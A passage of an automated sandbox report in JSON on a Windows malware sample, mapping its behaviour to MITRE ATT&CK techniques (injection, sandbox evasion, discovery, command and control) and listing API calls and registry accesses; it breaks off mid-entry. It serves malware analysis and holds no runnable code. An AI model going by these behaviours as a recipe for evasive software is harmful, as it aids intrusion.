"Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Disable or Modify System Firewall", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Portable Executable Injection", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "NTFS File Attributes", "attck_id": "T1564.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/004", "suspicious_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "System Binary Proxy Execution", "attck_id": "T1218", "attck_id_wiki": "https://attack.mitre.org/techniques/T1218", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 10}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 6, "informative_identifiers_count": 21}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "suspicious_identifiers_count": 1, "informative_identifiers_count": 12}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 4, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Account Discovery", "attck_id": "T1087", "attck_id_wiki": "https://attack.mitre.org/techniques/T1087", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 2, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Lateral Movement", "technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 3}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 3, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Data Encoding", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Mail Protocols", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "DNS", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "suspicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-267", "type": 6, "relevance": 1, "name": "Writes files in a temp directory", "description": "\"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\jwifylqa.exe\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesCacheCounterMutex\"\n \"Local\\ZonesLockedCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\RasPbFile\"\n \"\\Sessions\\1\\BaseNamedObjects\\Global\\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7\"\n \"RasPbFile\"\n \"Global\\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7\"", "origin": "Created Mutant", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" touched \"Security Manager\" (Path: \"HKCU\\CLSID\\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" touched \"Computer\" (Path: \"HKCU\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" touched \"Network\" (Path: \"HKCU\\CLSID\\{208D2C60-3AEA-1069-A2D7-08002B30309D}\\SHELLFOLDER\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" touched \"Recycle Bin\" (Path: \"HKCU\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\SHELLFOLDER\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" touched \"Control Panel\" (Path: \"HKCU\\CLSID\\{26EE0668-A00A-44D7-9371-BEB064C98683}\\SHELLFOLDER\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" touched \"UsersFiles\" (Path: \"HKCU\\CLSID\\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\\SHELLFOLDER\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" touched \"UsersLibraries\" (Path: \"HKCU\\CLSID\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\\SHELLFOLDER\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" touched \"CLSID_SearchFolder\" (Path: \"HKCU\\CLSID\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\\SHELLFOLDER\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" touched \"Microsoft OneNote Namespace Extension for Windows Desktop Search\" (Path: \"HKCU\\CLSID\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\\SHELLFOLDER\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" touched \"IE History and Feeds Shell Data Source for Windows Search\" (Path: \"HKCU\\CLSID\\{11016101-E366-4D22-BC06-4ADA335C892B}\\SHELLFOLDER\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" touched \"@C:\\Program Files (x86)\\Microsoft Office\\Office15\\MAPISHELL.DLL,-110\" (Path: \"HKCU\\CLSID\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\\SHELLFOLDER\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" touched \"Public Folder\" (Path: \"HKCU\\CLSID\\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\\SHELLFOLDER\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" touched \"Control Panel command object for Start menu and desktop\" (Path: \"HKCU\\CLSID\\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\\SHELLFOLDER\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" touched \"@%systemroot%\\system32\\mssvp.dll,-110\" (Path: \"HKCU\\CLSID\\{89D83576-6BD1-4C86-9454-BEB04E94C819}\\SHELLFOLDER\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" touched \"DXP\" (Path: \"HKCU\\CLSID\\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\\SHELLFOLDER\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" touched \"CLSID_SearchHome\" (Path: \"HKCU\\CLSID\\{9343812E-1C37-4A49-A12E-4B2D810D956B}\\SHELLFOLDER\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" touched \"Windows Search Service Media Center Namespace Extension Handler\" (Path: \"HKCU\\CLSID\\{98D99750-0B8A-4C59-9151-589053683D73}\\SHELLFOLDER\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" touched \"Other Users Folder\" (Path: \"HKCU\\CLSID\\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\\SHELLFOLDER\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" touched \"@%systemroot%\\system32\\mssvp.dll,-112\" (Path: \"HKCU\\CLSID\\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\\SHELLFOLDER\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" touched \"CLSID_StartMenuProviderFolder\" (Path: \"HKCU\\CLSID\\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\\SHELLFOLDER\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" touched \"CLSID_StartMenuPathCompleteProviderFolder\" (Path: \"HKCU\\CLSID\\{E345F35F-9397-435C-8F95-4E922C26259E}\\SHELLFOLDER\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" touched \"Games Explorer\" (Path: \"HKCU\\CLSID\\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\\SHELLFOLDER\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" touched \"Computers and Devices\" (Path: \"HKCU\\CLSID\\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\\SHELLFOLDER\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" touched \"Sticky Notes Namespace Extension for Windows Desktop Search\" (Path: \"HKCU\\CLSID\\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\\SHELLFOLDER\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" touched \"Memory Mapped Cache Mgr\" (Path: \"HKCU\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\\TREATAS\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-9", "type": 10, "name": "Loads the Bcrypt module DLL", "description": "\"netsh.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 74800000\n \"netsh.exe\" loaded module \"%WINDIR%\\System32\\bcryptprimitives.dll\" at 743C0000", "origin": "Loaded Module", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-138", "type": 6, "relevance": 3, "name": "Calls an API typically used to create an instance of a named pipe", "description": "\"svchost.exe\" called \"NtCreateNamedPipeFile\" with parameter \"pipe\\uqyipjlp\" - (UID: 00000000-00005312)", "origin": "API Call", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter GlobalAlloc (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter GetLastError (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter Sleep (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter VirtualAlloc (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter Module32First (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter LoadLibraryA (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter VirtualProtect (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter VirtualFree (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter GetVersionExA (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter TerminateProcess (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter ExitProcess (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter SetErrorMode (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter StackWalk64 (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter GetVolumeInformationA (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter GetComputerNameA (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter GetTickCount (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcess (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleA (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter GetSystemInfo (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter lstrcmpiA (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter lstrlenA (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter lstrcpynA (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter InterlockedExchange (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter GetCurrentThreadId (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter GetOverlappedResult (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter WaitForSingleObject (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter WriteFile (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter ReadFile (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter CreateFileA (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter DisconnectNamedPipe (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter ConnectNamedPipe (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter CreateNamedPipeA (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter GetEnvironmentVariableA (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter DeleteFileA (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter IsBadWritePtr (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter IsBadCodePtr (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter lstrcpyA (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter lstrcmpA (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter IsBadReadPtr (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter WriteProcessMemory (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter 